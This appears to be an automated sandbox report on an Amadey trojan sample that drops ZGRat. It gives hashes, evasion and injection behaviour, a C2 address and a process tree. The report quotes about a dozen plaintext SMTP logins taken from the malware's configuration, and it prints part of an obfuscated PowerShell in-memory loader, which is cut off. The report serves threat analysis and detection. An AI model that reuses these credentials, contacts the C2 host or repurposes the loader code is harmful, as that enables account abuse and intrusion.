amadey | dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4

Analysis

max time kernel
150s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
14-05-2024 23:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Size

1.8MB
MD5

8c2ad888796dd437e88eaec086475531
SHA1

f93a9948c83c4ddfe87279dd7fa167dee5baae07
SHA256

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4
SHA512

ba5371bea752a6659b3af866b28f757b3f744d6bd597085428dd7a41f3b649edf49eaeb0375174d81a78613f4293be1cd6c68924f196c3464c20b634f1ec9346
SSDEEP

24576:o8aAMAAc+3ElJVan2m+b54MfunwjhkN50g40yBdhEeuwwjzzHS2JtRTiYI:l1za7YOw6Njy/OSwTHScR

Score

10^/10

amadey zgrat evasion rat trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mx.sergw.com
Port:
587
Username:
[email protected]
Password:
wer111111

Extracted

Credentials

Protocol: smtp
Host:
mx.giochi0.it
Port:
587
Username:
[email protected]
Password:
cazzo1235

Extracted

Credentials

Protocol: smtp
Host:
securesmtp.genexine.com
Port:
587
Username:
[email protected]
Password:
CsB0000

Extracted

Credentials

Protocol: smtp
Host:
mx.giochi0.it
Port:
587
Username:
[email protected]
Password:
sara3357324135

Extracted

Credentials

Protocol: smtp
Host:
mx.breakthur.com
Port:
587
Username:
[email protected]
Password:
H0t3l741

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
abbs224you

Extracted

Credentials

Protocol: smtp
Host:
mx.gfgfgf.org
Port:
587
Username:
[email protected]
Password:
Lvhtc12345!

Extracted

Credentials

Protocol: smtp
Host:
wightman.ca
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
mail.pwatkins.co.uk
Port:
587
Username:
[email protected]
Password:
luvvy001123424

Extracted

Credentials

Protocol: smtp
Host:
mx.gfgfgf.org
Port:
587
Username:
[email protected]
Password:
!FW4PozpJ!

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
emily1

Extracted

Credentials

Protocol: smtp
Host:
mx.gcdetectivefree.com
Port:
587
Username:
[email protected]
Password:
phsffi

Extracted

Credentials

Protocol: smtp
Host:
mx.gcdetectivefree.com
Port:
587
Username:
[email protected]
Password:
vsHOeaB2681

Extracted

Credentials

Protocol: smtp
Host:
mx.progiftstore.org
Port:
587
Username:
[email protected]
Password:
3ehd1ixi1y

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 33 IoCs

resource	yara_rule
behavioral2/memory/3268-43-0x0000000007020000-0x0000000007260000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-51-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-49-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-47-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-67-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-79-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-87-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-93-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-91-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-103-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-107-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-105-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-101-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-99-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-97-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-96-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-89-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-85-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-83-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-81-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-77-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-75-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-73-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-71-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-69-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-65-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-63-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-61-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-59-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-58-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-55-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-53-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1
behavioral2/memory/3268-46-0x0000000007020000-0x000000000725A000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4908 created 632	4908	powershell.EXE	5

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

Executes dropped EXE 6 IoCs

pid	Process
1352	axplons.exe
3268	Kaxhwswfup.exe
1784	axplons.exe
884	$773372c6
4988	$77419698
2020	axplons.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Wine	axplons.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
1352	axplons.exe
1784	axplons.exe
2020	axplons.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3268 set thread context of 884	3268	Kaxhwswfup.exe	84
PID 4908 set thread context of 2616	4908	powershell.EXE	87
PID 3268 set thread context of 4988	3268	Kaxhwswfup.exe	88

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:34:01 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={429B9DBB-3190-43E3-8E20-2F0160FF5EEB}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715729640"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
1352	axplons.exe
1352	axplons.exe
1784	axplons.exe
1784	axplons.exe
4908	powershell.EXE
4908	powershell.EXE
4908	powershell.EXE
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
3268	Kaxhwswfup.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe
2616	dllhost.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3268	Kaxhwswfup.exe
Token: SeDebugPrivilege	4908	powershell.EXE
Token: SeDebugPrivilege	4908	powershell.EXE
Token: SeDebugPrivilege	2616	dllhost.exe
Token: SeDebugPrivilege	3268	Kaxhwswfup.exe
Token: SeShutdownPrivilege	440	dwm.exe
Token: SeCreatePagefilePrivilege	440	dwm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 1352	2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	81
PID 2364 wrote to memory of 1352	2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	81
PID 2364 wrote to memory of 1352	2364	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	81
PID 1352 wrote to memory of 3268	1352	axplons.exe	82
PID 1352 wrote to memory of 3268	1352	axplons.exe	82
PID 1352 wrote to memory of 3268	1352	axplons.exe	82
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 3268 wrote to memory of 884	3268	Kaxhwswfup.exe	84
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 4908 wrote to memory of 2616	4908	powershell.EXE	87
PID 2616 wrote to memory of 632	2616	dllhost.exe	5
PID 2616 wrote to memory of 692	2616	dllhost.exe	7
PID 2616 wrote to memory of 976	2616	dllhost.exe	12
PID 2616 wrote to memory of 440	2616	dllhost.exe	13
PID 2616 wrote to memory of 456	2616	dllhost.exe	14
PID 2616 wrote to memory of 860	2616	dllhost.exe	15
PID 2616 wrote to memory of 1052	2616	dllhost.exe	16
PID 2616 wrote to memory of 1060	2616	dllhost.exe	17
PID 2616 wrote to memory of 1132	2616	dllhost.exe	18
PID 2616 wrote to memory of 1212	2616	dllhost.exe	20
PID 2616 wrote to memory of 1224	2616	dllhost.exe	21
PID 2616 wrote to memory of 1308	2616	dllhost.exe	22
PID 2616 wrote to memory of 1396	2616	dllhost.exe	23
PID 2616 wrote to memory of 1448	2616	dllhost.exe	24
PID 2616 wrote to memory of 1600	2616	dllhost.exe	25
PID 2616 wrote to memory of 1612	2616	dllhost.exe	26
PID 2616 wrote to memory of 1644	2616	dllhost.exe	27
PID 2616 wrote to memory of 1652	2616	dllhost.exe	28
PID 2616 wrote to memory of 1740	2616	dllhost.exe	29
PID 2616 wrote to memory of 1788	2616	dllhost.exe	30
PID 2616 wrote to memory of 1844	2616	dllhost.exe	31
PID 2616 wrote to memory of 1932	2616	dllhost.exe	32
PID 2616 wrote to memory of 1980	2616	dllhost.exe	33
PID 2616 wrote to memory of 1988	2616	dllhost.exe	34
PID 2616 wrote to memory of 2056	2616	dllhost.exe	35
PID 2616 wrote to memory of 2064	2616	dllhost.exe	36
PID 2616 wrote to memory of 2180	2616	dllhost.exe	37
PID 2616 wrote to memory of 2252	2616	dllhost.exe	39
PID 2616 wrote to memory of 2392	2616	dllhost.exe	40
PID 2616 wrote to memory of 2568	2616	dllhost.exe	41
PID 2616 wrote to memory of 2576	2616	dllhost.exe	42
PID 2616 wrote to memory of 2620	2616	dllhost.exe	43
PID 2616 wrote to memory of 2632	2616	dllhost.exe	44
PID 2616 wrote to memory of 2648	2616	dllhost.exe	45
PID 2616 wrote to memory of 2720	2616	dllhost.exe	46
PID 2616 wrote to memory of 2732	2616	dllhost.exe	47
PID 2616 wrote to memory of 2756	2616	dllhost.exe	48
PID 2616 wrote to memory of 2780	2616	dllhost.exe	49
PID 2616 wrote to memory of 2792	2616	dllhost.exe	50
PID 2616 wrote to memory of 3104	2616	dllhost.exe	52
PID 2616 wrote to memory of 3340	2616	dllhost.exe	53

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:440
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{20938066-54d9-4b91-a636-8f0d840ae58b}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2616

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:860

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1224
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mBaHdzMYzvDa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$niVheqHByRnEmo,[Parameter(Position=1)][Type]$TkrtvzmLFo)$SDlcOSEWejH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+'e'+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'em'+'o'+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$SDlcOSEWejH.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+'deB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$niVheqHByRnEmo).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'ed');$SDlcOSEWejH.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+